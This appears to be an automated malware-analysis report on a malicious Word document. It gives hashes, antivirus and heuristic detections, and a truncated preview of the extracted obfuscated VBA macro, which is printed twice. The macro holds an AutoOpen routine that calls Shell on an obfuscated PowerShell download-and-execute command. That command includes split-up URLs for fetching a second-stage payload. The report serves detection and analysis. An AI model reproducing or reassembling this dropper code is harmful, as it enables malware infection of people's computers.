Office (OLE) malware analysis — malicious · c52f09e474c5d9b3

MALICIOUS

Office (OLE)

202.5 KB Created: 2017-12-14 06:34:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: e8d9eb977ec98e7616ac0a358d1a44b3 SHA-1: f9b475cff7f059645c511ffb0d5335db81fe590a SHA-256: c52f09e474c5d9b316e0b8e5e839282e52268a79b03bef1cefaaee4c2cec793e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical heuristic firing, to execute commands. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure, and the macro's execution of Shell() strongly indicates it's designed to download and execute a second-stage payload.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 78925 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	78925 bytes
SHA-256: `e50a6ce6d87c8c0c18314894ddff7b05fe35a7b74decd6ff3ddc11254ccf9779`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "LuvOKlM" Sub AutoOpen() KkfdMoLWIEdsLT = "MOGuMmY" + "AsMuwRRpLVPD" + "iirJaKETvp" + "bioAdYwJmDfkAu" + "FrPSXvPfi" + "PlmcTNECMSPc" + "LnWFRRwtq" + "NEMDdSDLC" + "POnMhSq" + "hnbzcaDfApw" + "kqYVYXGJb" + "JGNWAzzKYwbX" DnQclAwS = "NoVZpRnJL" + "AziVjFaGfpQA" + "NfViIvVJdRus" + "AbIiXPmvWN" + "RjWLtTdzNC" + "tUiiNqWX" + "jcLEwzwRBNqq" + "vRcYJPKnz" + "VshnAtBwYzj" + "oUSNwWLvzLScY" + "BphHNtlwq" + "QKvYARSq" GcIGwTnbCjJZ = "PkrMPQm" + "DrdFwmbnvitcq" + "otiknZRjQ" + "mKuLjoCBDzCk" + "AzhLnGzQzOz" + "wdidMWTbwTmrPH" + "jrYtPDOi" + "GNdcTRpvzPhK" + "YqbiJhhMqv" + "zRYZVhsjvsW" + "sqHfdqtAZwIShR" + "thAYPSzdCsP" QWzPfBrjsB = "DWzvGDI" + "rDBzCuT" + "jvNFnNQd" + "bjdQpiorfwC" + "WqZtmYWPX" + "VLuKniwOpFTRiW" + "pBVMHXwQnKE" + "MApuOGjLRViuJ" + "QGzzELDOzWACPX" + "uHAjrkOzKF" + "wLNTXaDM" + "rToFtkzD" VBA.Shell$ TTjVYaz, 0 tLqJoWOiLS = "BGnttNrA" + "zawDPfbSupG" + "LjQuVpXqEsOk" + "FkjvMfs" + "YUTMmtIvwjVLYq" + "WzYXUKZGMNC" + "vvWiKOpm" + "zhiwOvHJ" + "ZcPJJwoHYmwOG" + "kiMzaBLziDOZSq" + "FOSzToaullZ" + "CqDnzqizNCvhIj" tLvkizjSXjQ = "KKoaNAGJHfQQi" + "sODTkpmMjjqB" + "wWXfGhDXnZbhhB" + "VNuiBuFROD" + "bAwdEjMFKnjzJj" + "MFpcmDnPqSo" + "AArEJcKF" + "YJUrVcr" + "mOlvViAcmRto" + "HKQYLESiZXzi" + "nvUkQbwfEED" + "fSqbWKRRR" zDTJXYBMr = "RsuEHBARsGDG" + "HjmbHDMiM" + "WwRRHDXd" + "MRwmXmUVKzYKN" + "qLdkwuJiDEjYI" + "jtOUcKtvJtPpn" + "CjoBIDaGdSaj" + "iOuGwddlQkEi" + "zuCjVHG" + "bUQiPFQdPvu" + "bLhOmQMJwlwkS" + "EjDuzTc" End Sub Function TTjVYaz() jipbRcrBG = "VLzKCzIp" + "fEvYCkvmNW" + "IUAXsZhihN" + "uYwErQFETIAK" + "CoiGrfzrZNC" + "KbSdPdH" + "wJXbwtfh" + "DOIKZUDq" + "nCOpVKuDjom" + "DisDdtRHIwA" + "jWzuqkHOm" + "pFsIoMhvMqujz" + "PHwbmjSpBzGw" VMzvDTQdG = "GNFNmPHhBpE" + "viiwzXMPVCHu" + "SdIBVYlIZo" + "laruUzJDDRmqId" + "kzXJDGLrT" + "zjjQTcWtoLYj" + "uWtDrEjnz" + "BonlPloZiX" + "VTdnjoPz" + "RuEjcnKCUm" + "wzHicjrHIzmqI" + "ZCPQHQQp" + "GHkGJcalEvk" IwXBpfU = Mid("b7LE8bjLsf+Lsfbc.ToString(BRMlkDTNUAWjpCswIm", 8, 19) lfREUPKcM = "zNvjXpOo" + "KUEFaNlJWCWQ" + "iojcCWADvCp" + "hhQKXrl" + "cwcWhJFDsaDcvU" + "HAvmrojPRPE" + "fVzzLlWCmMJut" + "zLUzNFNDJ" + "bEuFtjKG" + "RZhtarrYSrv" + "BtaqXvSCwfcMq" + "HrQIGBCRbr" + "RuHWjuLNS" bhBtdRPhs = "qECZMdcXYcVuSF" + "wrPJAfirDkEWbF" + "AEiIiwOCa" + "QipMSNi" + "lLQXMdT" + "MwoHHBRK" + "QMJawkpoHjw" + "fkWZSpuzcsEpW" + "PNSvPQilBBVc" + "bbiFtWOhORioL" + "NwYHUEOVbW" + "UjOtiVDq" + "SWunLSH" lpTHTzYin = "KUOVlsEilzV" + "CjzIJlt" + "jSibFAKfRkQwY" + "zXBmUJwnpttOrY" + "YkaUdqslnQ" + "hYMBjXfEmcGX" + "jpwcohqJm" + "tzqduHFl" + "WkbZaoNWj" + "ltRNJkotQzFZb" + "PTBqtlwhrsBfHQ" + "nbLHVAQbmj" + "GNpoIwJjKHmWd" scQjcwRbB = Mid("Buv0szsMiCQpiHzjSbD2jXk+LsfxLsf)') -crEpLacE 'Lsf',[CHAR]39 -RepLace 'mJq',[CHAR]36 -RepLace ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) \|.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')Oju", 24, 155) JjIICSKEfrA = "BwjHDsR" + "dtBYYGzMtZqA" + "fwiwJEqEkwBwM" + "fmEQnwHFbC" + "dMWhtlcHO" + "zFJunahszz" + "LmUZoICDfZU" + "ffsUWrKZpzw" + "hvVzWZMiCqR" + "BIFcZEividd" + "vGKBmamNn" + "stnDhFMqZpNRS" + "lizlPCAES" dkCtbwi = "rdLfFsUQzuD" + "lqQLtqjwCGtmJv" + "FXFwtFzNmjEn" + "VQCVKdqTEdcGuD" + "kkZWKIPtrvJ" + "ndiioDjdlEYcfE" + "AucswCXdC" + "icoFXKZA" + "CqawnDLZofMz" + "GsOzODKrQzbWG" + "uXOuwbvBZav" + "pncizqKsWvrXv" + "qslqzbhcQC" CrrnzTKQLmT = "EPOLrcE" + "mMQMpWW" + "ioDnCdnwPEa" + "wlpnajw" + "qBzzkJiGw" + "sdOmTMAiEa" + "SwmBDFBWclJ" + "FlhoGDszjz" + "MwmMRdmvcYpYF" + "vhEdjWoj" + "JAmXubL" + "vUGaEQsjtpp" + "zPNccKVoVwbB" UImbicO = Mid("cr+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhDhjHJNc6b6dajF", 3, 158) hYRSAor = "lNVuEToDZO" + "PiCkMOEwfq" + "clDQiaUHMXaILd" + "zScDUVHTdDoOP" + "YRWinlkro" + "NjSCzoZqHXQm" + "cWcVSZMuMF" + "oGEZYsE ... (truncated)

SHA-256: e50a6ce6d87c8c0c18314894ddff7b05fe35a7b74decd6ff3ddc11254ccf9779

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LuvOKlM"
Sub AutoOpen()
KkfdMoLWIEdsLT = "MOGuMmY" + "AsMuwRRpLVPD" + "iirJaKETvp" + "bioAdYwJmDfkAu" + "FrPSXvPfi" + "PlmcTNECMSPc" + "LnWFRRwtq" + "NEMDdSDLC" + "POnMhSq" + "hnbzcaDfApw" + "kqYVYXGJb" + "JGNWAzzKYwbX"
DnQclAwS = "NoVZpRnJL" + "AziVjFaGfpQA" + "NfViIvVJdRus" + "AbIiXPmvWN" + "RjWLtTdzNC" + "tUiiNqWX" + "jcLEwzwRBNqq" + "vRcYJPKnz" + "VshnAtBwYzj" + "oUSNwWLvzLScY" + "BphHNtlwq" + "QKvYARSq"
GcIGwTnbCjJZ = "PkrMPQm" + "DrdFwmbnvitcq" + "otiknZRjQ" + "mKuLjoCBDzCk" + "AzhLnGzQzOz" + "wdidMWTbwTmrPH" + "jrYtPDOi" + "GNdcTRpvzPhK" + "YqbiJhhMqv" + "zRYZVhsjvsW" + "sqHfdqtAZwIShR" + "thAYPSzdCsP"
QWzPfBrjsB = "DWzvGDI" + "rDBzCuT" + "jvNFnNQd" + "bjdQpiorfwC" + "WqZtmYWPX" + "VLuKniwOpFTRiW" + "pBVMHXwQnKE" + "MApuOGjLRViuJ" + "QGzzELDOzWACPX" + "uHAjrkOzKF" + "wLNTXaDM" + "rToFtkzD"
VBA.Shell$ TTjVYaz, 0
tLqJoWOiLS = "BGnttNrA" + "zawDPfbSupG" + "LjQuVpXqEsOk" + "FkjvMfs" + "YUTMmtIvwjVLYq" + "WzYXUKZGMNC" + "vvWiKOpm" + "zhiwOvHJ" + "ZcPJJwoHYmwOG" + "kiMzaBLziDOZSq" + "FOSzToaullZ" + "CqDnzqizNCvhIj"
tLvkizjSXjQ = "KKoaNAGJHfQQi" + "sODTkpmMjjqB" + "wWXfGhDXnZbhhB" + "VNuiBuFROD" + "bAwdEjMFKnjzJj" + "MFpcmDnPqSo" + "AArEJcKF" + "YJUrVcr" + "mOlvViAcmRto" + "HKQYLESiZXzi" + "nvUkQbwfEED" + "fSqbWKRRR"
zDTJXYBMr = "RsuEHBARsGDG" + "HjmbHDMiM" + "WwRRHDXd" + "MRwmXmUVKzYKN" + "qLdkwuJiDEjYI" + "jtOUcKtvJtPpn" + "CjoBIDaGdSaj" + "iOuGwddlQkEi" + "zuCjVHG" + "bUQiPFQdPvu" + "bLhOmQMJwlwkS" + "EjDuzTc"
End Sub
Function TTjVYaz()
jipbRcrBG = "VLzKCzIp" + "fEvYCkvmNW" + "IUAXsZhihN" + "uYwErQFETIAK" + "CoiGrfzrZNC" + "KbSdPdH" + "wJXbwtfh" + "DOIKZUDq" + "nCOpVKuDjom" + "DisDdtRHIwA" + "jWzuqkHOm" + "pFsIoMhvMqujz" + "PHwbmjSpBzGw"
VMzvDTQdG = "GNFNmPHhBpE" + "viiwzXMPVCHu" + "SdIBVYlIZo" + "laruUzJDDRmqId" + "kzXJDGLrT" + "zjjQTcWtoLYj" + "uWtDrEjnz" + "BonlPloZiX" + "VTdnjoPz" + "RuEjcnKCUm" + "wzHicjrHIzmqI" + "ZCPQHQQp" + "GHkGJcalEvk"
IwXBpfU = Mid("b7LE8bjLsf+Lsfbc.ToString(BRMlkDTNUAWjpCswIm", 8, 19)
lfREUPKcM = "zNvjXpOo" + "KUEFaNlJWCWQ" + "iojcCWADvCp" + "hhQKXrl" + "cwcWhJFDsaDcvU" + "HAvmrojPRPE" + "fVzzLlWCmMJut" + "zLUzNFNDJ" + "bEuFtjKG" + "RZhtarrYSrv" + "BtaqXvSCwfcMq" + "HrQIGBCRbr" + "RuHWjuLNS"
bhBtdRPhs = "qECZMdcXYcVuSF" + "wrPJAfirDkEWbF" + "AEiIiwOCa" + "QipMSNi" + "lLQXMdT" + "MwoHHBRK" + "QMJawkpoHjw" + "fkWZSpuzcsEpW" + "PNSvPQilBBVc" + "bbiFtWOhORioL" + "NwYHUEOVbW" + "UjOtiVDq" + "SWunLSH"
lpTHTzYin = "KUOVlsEilzV" + "CjzIJlt" + "jSibFAKfRkQwY" + "zXBmUJwnpttOrY" + "YkaUdqslnQ" + "hYMBjXfEmcGX" + "jpwcohqJm" + "tzqduHFl" + "WkbZaoNWj" + "ltRNJkotQzFZb" + "PTBqtlwhrsBfHQ" + "nbLHVAQbmj" + "GNpoIwJjKHmWd"
scQjcwRbB = Mid("Buv0szsMiCQpiHzjSbD2jXk+LsfxLsf)') -crEpLacE  'Lsf',[CHAR]39  -RepLace  'mJq',[CHAR]36 -RepLace  ([CHAR]111+[CHAR]56+[CHAR]122),[CHAR]124) |.( $eNv:publiC[13]+$env:PUBlIC[5]+'X')Oju", 24, 155)
JjIICSKEfrA = "BwjHDsR" + "dtBYYGzMtZqA" + "fwiwJEqEkwBwM" + "fmEQnwHFbC" + "dMWhtlcHO" + "zFJunahszz" + "LmUZoICDfZU" + "ffsUWrKZpzw" + "hvVzWZMiCqR" + "BIFcZEividd" + "vGKBmamNn" + "stnDhFMqZpNRS" + "lizlPCAES"
dkCtbwi = "rdLfFsUQzuD" + "lqQLtqjwCGtmJv" + "FXFwtFzNmjEn" + "VQCVKdqTEdcGuD" + "kkZWKIPtrvJ" + "ndiioDjdlEYcfE" + "AucswCXdC" + "icoFXKZA" + "CqawnDLZofMz" + "GsOzODKrQzbWG" + "uXOuwbvBZav" + "pncizqKsWvrXv" + "qslqzbhcQC"
CrrnzTKQLmT = "EPOLrcE" + "mMQMpWW" + "ioDnCdnwPEa" + "wlpnajw" + "qBzzkJiGw" + "sdOmTMAiEa" + "SwmBDFBWclJ" + "FlhoGDszjz" + "MwmMRdmvcYpYF" + "vhEdjWoj" + "JAmXubL" + "vUGaEQsjtpp" + "zPNccKVoVwbB"
UImbicO = Mid("cr+LPh://LPh+'+'LPhiiLPhLsf+Lsf+L'+'PhtaiLPhLsf+Lsf+LPhntLPh+LPhernationLPh+LPhalhouse.org/'+'LPh+LPhQGO0E/,httLPh+LPhp'+'LPh+LPh://fixLPh+LPhxoo.'+'in/pLPh+LPhDhjHJNc6b6dajF", 3, 158)
hYRSAor = "lNVuEToDZO" + "PiCkMOEwfq" + "clDQiaUHMXaILd" + "zScDUVHTdDoOP" + "YRWinlkro" + "NjSCzoZqHXQm" + "cWcVSZMuMF" + "oGEZYsE
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.